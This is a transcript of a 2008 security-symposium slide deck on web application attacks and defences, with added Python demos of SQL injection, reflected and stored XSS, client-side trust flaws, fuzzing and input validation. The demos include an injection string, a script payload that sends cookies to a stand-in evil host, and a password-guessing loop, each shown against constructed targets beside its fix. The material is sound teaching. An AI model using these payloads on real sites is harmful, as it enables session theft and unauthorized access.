COMPUTER INFORMATION TECHNOLOGY AT NKU
Application Security through a Hacker's Eyes
James Walden
Northern Kentucky University
[email protected]
October 3, 2008
IMI Security Symposium
Why Do Hackers Target Web Apps?
Attack Surface
A system's attack surface consists of all of the ways an adversary can enter the system.
(Image: Merchant's Bank Building)
Defender’s View of Attack Surface
web server
firewall
wireless
VPN
Firewalls don’t protect Web Apps
(Diagram: a Web Client sends HTTP traffic on port 80 through the Firewall to the Web Server, which hands it to the Application and on to the Database Server. telnet and ftp are stopped at the Firewall, but port 80 has to be open, so anything an attacker puts inside HTTP reaches the application and the database untouched.)
SSL won’t stop injection attacks, XSS
(Diagram: the same path with HTTPS traffic on port 443. The Firewall still stops telnet and ftp and still passes the web traffic; SSL encrypts the connection between Web Client and Web Server but delivers the attacker's input to the Application and the Database Server unchanged, so injection and XSS payloads arrive exactly as sent.)
Revised View of Attack Surface
(Diagram: the attack surface now includes external web apps, the external web server, the firewall, VPN, wireless, and the database.)
Intranet Security Assumptions
Since the firewall protects you:
Patches don't have to be up to date.
Passwords don't have to be strong.
There's no need to be careful when you code.
There's no need to audit your source code.
There's no need to run penetration tests.
But do your users have web browsers?
Javascript Malware controls Clients
(Diagram: the Intranet, holding the Main Server and the Wiki Group Server, sits behind the Firewall, which stops telnet and ftp. A Web Client on the intranet fetches a page over HTTP on port 80 from an outside Web Server that serves Javascript malware; the script then runs inside the browser, already on the intranet side of the firewall.)
Java can see your real IP address behind a NAT router.
Javascript can scan your intranet behind a NAT router.
Sources of Javascript Malware
1. Evil web site owner inserts it in a page.
2. Attacker inserts malware into a defaced page.
3. Attacker inserts malware into a public comment or forum post (stored XSS).
4. Attacker creates a link that causes the web site to echo malware to the user (reflected XSS).
Re-revised View of Attack Surface
(Diagram: external web server, external web apps, internal web apps, internal web servers, database, firewall, VPN, wireless.)
Web Applications
(Diagram: the same attack surface, showing the web application components: external web server, external web apps, internal web apps, internal web servers, database, alongside the firewall, VPN and wireless entry points.)
Web Application Vulnerabilities
Input-based Security Problems
– Injection Flaws
– Insecure Remote File Inclusion
– Unvalidated Input
Authentication and Authorization
– Authentication
– Access Control
– Cross-Site Attacks
Other Bugs
– Error Handling and Information Leakage
– Insecure Storage
– Insecure Communications
SQL Injection
1. App sends form to user.
2. Attacker submits form with SQL exploit data.
3. Application builds string with exploit data.
4. Application sends SQL query to DB.
5. DB executes query, including exploit, sends data back to application.
6. Application returns data to user.
(Diagram: Attacker -> Firewall -> Web Server -> DB Server. The submitted login form has User = ' or 1=1-- and any value in Pass.)
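The six steps above, as an added example in Python that is not from the slides: a login query built by string formatting (step 3) against an in-memory SQLite database, fed the User field value from the diagram, beside the parameterized query that fixes it. The accounts and the table are constructed for the demonstration.

```python
import sqlite3

# Constructed sample accounts for the demonstration; not from the slides.
USERS = [("alice", "s3cret"), ("bob", "hunter2")]


def make_db():
    """In-memory users table holding the two constructed accounts."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (user TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", USERS)
    return conn


def login_vulnerable(conn, user, password):
    """Step 3 of the slide: the form fields are pasted into the query
    text, so whatever the attacker typed becomes part of the SQL."""
    sql = "SELECT user FROM users WHERE user = '%s' AND password = '%s'" % (
        user, password)
    return [row[0] for row in conn.execute(sql)]


def login_parameterized(conn, user, password):
    """Hardened form: the query shape is fixed and the form fields are
    bound as data, so they cannot change the WHERE clause."""
    sql = "SELECT user FROM users WHERE user = ? AND password = ?"
    return [row[0] for row in conn.execute(sql, (user, password))]


def demo():
    """Run the diagram's payload through both versions of the login."""
    conn = make_db()
    payload = "' or 1=1--"   # User field from the diagram; Pass can be anything
    return {
        # ' or 1=1 makes the WHERE clause true for every row and the --
        # comments out the password check: every account is returned.
        "vulnerable": login_vulnerable(conn, payload, "x"),
        # Bound as data, the payload is just a user name nobody has.
        "parameterized": login_parameterized(conn, payload, "x"),
        "legit": login_parameterized(conn, "alice", "s3cret"),
    }
```

The vulnerable query becomes `SELECT user FROM users WHERE user = '' or 1=1--' AND password = 'x'`; SQLite evaluates `user = '' or 1=1` and ignores the rest as a comment, which is step 5 of the slide.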
Cross-Site Scripting
(Diagram: Attacker, User and Web Server. Steps shown: 3. XSS attack against the Web Server. 4. User clicks on the XSS link. 7. Browser runs the injected code. Evil site saves the ID.)
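Added example in Python, not from the slides, of the reflected and stored XSS cases from the previous two slides: a search page that echoes the query unencoded beside one that applies HTML entity encoding (prevention guideline 6 later in the talk), a comments page with the same choice, and the link the attacker sends. The payload, comments and URL are constructed.

```python
import html
from urllib.parse import quote_plus

# Constructed attacker payload: ships the cookie to the evil site (step 7).
PAYLOAD = "<script>new Image().src='http://evil.example/?c='+document.cookie</script>"


def search_page(query, encode):
    """Reflected XSS when encode is False: the query from the URL is
    echoed straight into the page. With encode=True, html.escape turns
    < > & and quotes into entities, so the text is displayed, not run."""
    shown = html.escape(query, quote=True) if encode else query
    return "<h1>Results for %s</h1>" % shown


def comments_page(comments, encode):
    """Stored XSS when encode is False: the attacker's comment is saved
    once and every later visitor receives it as live markup."""
    items = []
    for author, text in comments:
        if encode:
            author = html.escape(author, quote=True)
            text = html.escape(text, quote=True)
        items.append("<li><b>%s</b>: %s</li>" % (author, text))
    return "<ul>%s</ul>" % "".join(items)


def reflected_xss_link(search_url, payload):
    """Steps 3 and 4: the link the attacker gets the user to click; the
    server reflects the q parameter back in search_page."""
    return "%s?q=%s" % (search_url, quote_plus(payload))


def has_live_script(page):
    """Crude detector for the demonstration: an unencoded <script> tag."""
    return "<script>" in page.lower()


def demo():
    """Constructed comment store with one hostile entry."""
    comments = [("bob", "nice site"), ("mallory", PAYLOAD)]
    return {
        "reflected_raw": has_live_script(search_page(PAYLOAD, encode=False)),
        "reflected_encoded": has_live_script(search_page(PAYLOAD, encode=True)),
        "stored_raw": has_live_script(comments_page(comments, encode=False)),
        "stored_encoded": has_live_script(comments_page(comments, encode=True)),
        "link": reflected_xss_link("http://site.example/search", PAYLOAD),
    }
```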
Web Application Attack Surface
cookies
form inputs
HTTP headers
URLs
Traditional Web Applications
(Diagram: every round trip is a whole page. HTTP Request (form submission) -> Server processing, during which the user waits -> HTTP Response (new web page) -> User interaction -> HTTP Request (form submission) -> Server processing, user waits again -> HTTP Response (new web page).)
AJAX
Asynchronous Javascript and XML
The user interacts with client-side Javascript.
The Javascript makes asynchronous requests to the server for data.
The user can keep interacting with the application while requests are outstanding.
The page is updated when encoded data arrives from the server.
AJAX Applications
(Diagram: Client-side Code handles each User interaction and sends an asynchronous HTTP request; the server processes it and returns an HTTP Response carrying data, which the client-side code applies as a partial update of the page. User interaction continues while requests are in flight, so several request/response pairs overlap.)
Example Client-side Code
// Authentication, pricing and debiting are all decided in the browser,
// so a user who edits this script can skip or change any of them.
var auth = checkPassword(user, pass);
if (auth == false) {
    alert('Authentication failed.');
    return;
}
var itemPrice = getPrice(itemID);   // price computed on the client
debitAccount(user, itemPrice);      // client chooses what it is charged
downloadItem(itemID);               // attacker can call this directly
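The snippet above does its checks in the browser. As an added example that is not from the slides, here is the server side of that API in Python: one purchase handler that believes the client's auth flag and price, beside one that takes identity from a server-side session, price from the server's own catalog, and checks access on every transaction (guidelines 2 and 7 of the prevention list later in the talk). Catalog, accounts, session token and request contents are constructed.

```python
# Constructed catalog and session store; none of these values are from the slides.
PRICES = {"song-42": 99, "album-7": 999}      # prices in cents
SESSIONS = {"tok-alice": "alice"}             # server-side session store


def purchase_trusting_client(accounts, request):
    """Server that mirrors the slide's client-side flow: it believes the
    'auth' flag and the 'price' the browser sends. Anyone who edits the
    request skips authentication and names their own price."""
    if not request.get("auth"):
        return "auth failed"
    user, price, item = request["user"], request["price"], request["itemID"]
    if accounts.get(user, 0) < price:
        return "insufficient funds"
    accounts[user] -= price
    return "download " + item


def purchase_checked_server_side(accounts, request):
    """Identity comes from the session token, the price from the server's
    catalog, and both checks run here on every transaction."""
    user = SESSIONS.get(request.get("session"))
    if user is None:
        return "auth failed"
    item = request.get("itemID")
    if item not in PRICES:
        return "no such item"
    price = PRICES[item]
    if accounts.get(user, 0) < price:
        return "insufficient funds"
    accounts[user] -= price
    return "download " + item


def demo():
    """A forged request: auth asserted, price zero, for the dearest item.
    Each handler gets its own copy of the constructed account balances."""
    accounts = {"alice": 500}
    forged = {"user": "alice", "auth": True, "price": 0, "itemID": "album-7"}
    return {
        "trusting": purchase_trusting_client(dict(accounts), forged),
        "checked_no_session": purchase_checked_server_side(dict(accounts), forged),
        "checked_with_session": purchase_checked_server_side(
            dict(accounts), dict(forged, session="tok-alice")),
        "checked_legit": purchase_checked_server_side(
            dict(accounts), {"session": "tok-alice", "itemID": "song-42"}),
    }
```

The trusting handler hands over the album for free; the checked one refuses the forged request outright and, even with a valid session, charges the catalog price, which the constructed balance cannot cover.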
AJAX Application Attack Surface
cookies
form inputs
HTTP headers
URLs
client-side code
client-side state
client-side data transforms
server API
Drilling Down: Mapping the Application
1. Visible Content
   1. Spider the site.
   2. Browse the site while using an intercepting proxy.
2. Hidden Content
   1. Unlinked sections of the site.
   2. Backup copies of live files.
   3. Configuration and include files.
   4. Source code.
   5. Log files.
Entry Points
For each resource found, identify inputs:
Additional path parameters
Query string
POST parameters
Cookies
HTTP headers
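Added example, not from the slides: a Python function that takes one request captured through an intercepting proxy during the mapping step and splits it into the entry points listed above. The raw request is constructed; the ';key=value' form of path parameter is an assumption about the target, since the slide does not say how its path parameters are encoded.

```python
from http.cookies import SimpleCookie
from urllib.parse import urlsplit, parse_qsl

# Constructed request, as an intercepting proxy would show it; not from the slides.
SAMPLE_REQUEST = (
    "POST /app/view/42;mode=edit?id=7&page=2 HTTP/1.1\r\n"
    "Host: shop.example\r\n"
    "Cookie: sid=abc123; theme=dark\r\n"
    "User-Agent: Mozilla/5.0\r\n"
    "Referer: http://shop.example/list\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "\r\n"
    "name=bob&comment=hello"
)


def entry_points(raw):
    """Split one captured request into the five input classes on the slide:
    path parameters, query string, POST parameters, cookies, HTTP headers."""
    head, _, body = raw.partition("\r\n\r\n")
    request_line, *header_lines = head.split("\r\n")
    method, target, _version = request_line.split(" ", 2)
    parts = urlsplit(target)          # keeps ';params' inside .path

    # Path parameters: ';key=value' segments attached to a path element
    # (assumed encoding for the demonstration).
    path_params = []
    for segment in parts.path.split("/"):
        for extra in segment.split(";")[1:]:
            path_params.append(tuple(extra.split("=", 1)))

    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip()] = value.strip()
    cookies = SimpleCookie(headers.get("Cookie", ""))

    return {
        "method": method,
        "resource": parts.path,
        "path_params": path_params,
        "query": parse_qsl(parts.query, keep_blank_values=True),
        "post": parse_qsl(body, keep_blank_values=True) if method == "POST" else [],
        "cookies": {k: m.value for k, m in cookies.items()},
        # Every remaining header is attacker-controlled too (Referer, User-Agent...).
        "headers": {k: v for k, v in headers.items() if k != "Cookie"},
    }


def count_inputs(ep):
    """Number of distinct inputs a tester would have to probe for this resource."""
    return (len(ep["path_params"]) + len(ep["query"]) + len(ep["post"])
            + len(ep["cookies"]) + len(ep["headers"]))
```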
Application Feature Vulnerability Map
Database interaction: SQL injection.
Displays user-supplied data: Cross-site scripting.
Error messages: Information leakage.
File upload/download: Path traversal.
Login: Authentication, session management, access control flaws.
Code Auditing
Why?
Find vulnerabilities faster than testing.
Find different vulnerabilities than testing.
What?
Identify modules of high business risk.
Use static analysis to find common vulnerabilities.
Manually review code + static analysis results.
Who?
Developers, security team, outside auditors.
When?
On a regular basis, at least once before release.
Static Analysis
Automated assistance for code auditing
Speed: review code faster than humans can.
Accuracy: hundreds of secure coding rules.
Tools: Coverity, FindBugs, Fortify, Klocwork, Ounce Labs.
(Diagram: the tools produce results, which are then reviewed by hand.)
Fuzz Testing
Fuzz testing consists of
Sending unexpected input.
Monitoring for exceptions.
Monitoring for Exceptions
Application mapping: response code, response size, presence of the string “not authorized”.
Password guessing: response code, response size, presence of the string “login incorrect”.
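Added example, not from the slides: a small fuzz loop in Python that sends payloads into one field of a constructed stand-in application and flags responses whose code, size or marker-string presence differ from a baseline, covering both cases on the slide. The target application, its credentials and its session value are constructed; a real run would send the same requests over HTTP.

```python
# Constructed stand-in for the target: a login handler and a page with an
# authorization check. The credentials and session value are made up.
def target_app(path, params):
    """Returns (status, body) as a server would; the fuzzer sees only these."""
    if path == "/login":
        if params.get("user") == "admin" and params.get("pass") == "letmein":
            return 302, "redirecting to /admin"
        return 200, "login incorrect"
    if path == "/admin":
        if params.get("sid") == "admin-session":
            return 200, "<h1>admin panel</h1>" + "x" * 400
        return 403, "not authorized"
    return 404, "no such page"


def fingerprint(status, body, marker):
    """The three signals the slide monitors: response code, response size,
    presence of the marker string."""
    return (status, len(body), marker in body)


def fuzz(path, base_params, field, payloads, marker):
    """Send each payload in one field and return the baseline fingerprint
    plus every payload whose fingerprint differs from it: those are the
    'exceptions' a tester then examines by hand."""
    baseline = fingerprint(*target_app(path, base_params), marker)
    hits = []
    for payload in payloads:
        params = dict(base_params, **{field: payload})
        fp = fingerprint(*target_app(path, params), marker)
        if fp != baseline:
            hits.append((payload, fp))
    return baseline, hits


def password_guessing():
    """Slide case 2: vary the password, watch for 'login incorrect' to vanish."""
    return fuzz("/login", {"user": "admin", "pass": "wrong"}, "pass",
                ["password", "123456", "letmein"], "login incorrect")


def application_mapping():
    """Slide case 1: vary the session id, watch for 'not authorized' to vanish."""
    return fuzz("/admin", {"sid": "none"}, "sid",
                ["guest", "admin-session"], "not authorized")
```

A single differing signal is enough to report a hit; in practice the size check catches pages that return 200 for everything and only change the body.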
Prevention Guidelines
1. Use a standard, secure authentication scheme.
2. Check access control on every transaction.
3. Avoid using interpreters where possible.
4. Don't leak sensitive information in error pages.
5. Encrypt sensitive data in transit and on disk.
6. Encode user data in output.
7. Don't trust any data from the client.
8. Validate all input.
Input Validation
Blacklist: reject known bad input
Reject input matching list of bad strings/patterns.
Accept all other input.
Vulnerable to encoding attacks.
Whitelist: accept known good input
Accept input matching list of good strings/patterns.
Reject all other input.
Highly effective, but not always feasible.
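Added example in Python, not from the slides, of why a blacklist is vulnerable to encoding attacks and what the whitelist alternative looks like: a blacklist filter, a URL-decode pass such as a component behind the filter may apply, and a username whitelist. The pattern list and the payloads are constructed.

```python
import re
from urllib.parse import unquote

# Constructed blacklist; real ones are longer and still incomplete.
BAD_PATTERNS = ["<script", "javascript:", "onerror="]


def blacklist_ok(value):
    """Blacklist: reject input containing a known-bad string, accept the rest."""
    low = value.lower()
    return not any(bad in low for bad in BAD_PATTERNS)


def whitelist_username_ok(value):
    """Whitelist: accept only the characters and length a username may have."""
    return re.fullmatch(r"[A-Za-z0-9_.-]{1,32}", value) is not None


def url_decode(value, rounds=1):
    """One or more URL-decode passes, as a component downstream of the
    filter may apply after the filter has already said yes."""
    for _ in range(rounds):
        value = unquote(value)
    return value


def judge(value, decode_rounds=1):
    """What each filter says about the value as submitted, and what the
    blacklist would have said about the value after decoding."""
    return {
        "blacklist": blacklist_ok(value),
        "blacklist_after_decode": blacklist_ok(url_decode(value, decode_rounds)),
        "whitelist": whitelist_username_ok(value),
    }
```

The encoded payload passes the blacklist because `%3Cscript%3E` does not contain `<script`; the whitelist rejects it because `%` is not a username character, without needing to know what the payload was trying to do.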
A site's attack surface is nearly fractal.
(Diagram: the earlier maps nested inside one another.
Site: external web server, external web apps, internal web apps, internal web servers, database, firewall, VPN, wireless.
Application: cookies, form inputs, HTTP headers, URLs, client-side code, client-side state, client-side data transforms, server API.
Content: 1. Visible Content: 1. Linked URLs. 2. Authenticated URLs. 2. Hidden Content: 1. Unlinked sections of site. 2. Backup copies of live files. 3. Configuration/include files. 4. Source code. 5. Log files.)